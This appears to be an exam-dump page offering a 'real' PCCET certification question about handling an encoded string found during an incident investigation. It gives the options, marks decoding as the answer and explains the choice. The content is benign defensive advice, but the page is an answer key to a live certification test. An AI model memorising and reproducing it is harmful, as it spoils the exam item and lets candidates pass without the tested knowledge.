PCCET Question #200: Real Exam Question with Answer & Explanation

Question

What should a security operations engineer do if they are presented with an encoded string during an incident investigation?

Options

• ASave it to a new file and run it in a sandbox.
• BRun it against VirusTotal.
• CAppend it to the investigation notes but do not alter it.
• DDecode the string and continue the investigation.

Explanation

An encoded string is a common technique used by attackers to obfuscate their malicious code or data. By decoding the string, a security operations engineer can reveal the true nature and intent of the attacker, and potentially discover indicators of compromise (IOCs) such as IP addresses, domain names, file names, etc. Decoding the string can also help the engineer to determine the type and severity of the incident, and the appropriate response actions. Therefore, decoding the string and continuing the investigation is the best option among the given choices. Saving the string to a new file and running it in a sandbox may be risky, as it could execute the malicious code and cause further damage. Running the string against VirusTotal may not yield any useful results, as the string may not be recognized by any antivirus engines. Appending the string to the investigation notes but not altering it may not provide any additional insight into the incident, and may delay the response process.

No community discussion yet for this question.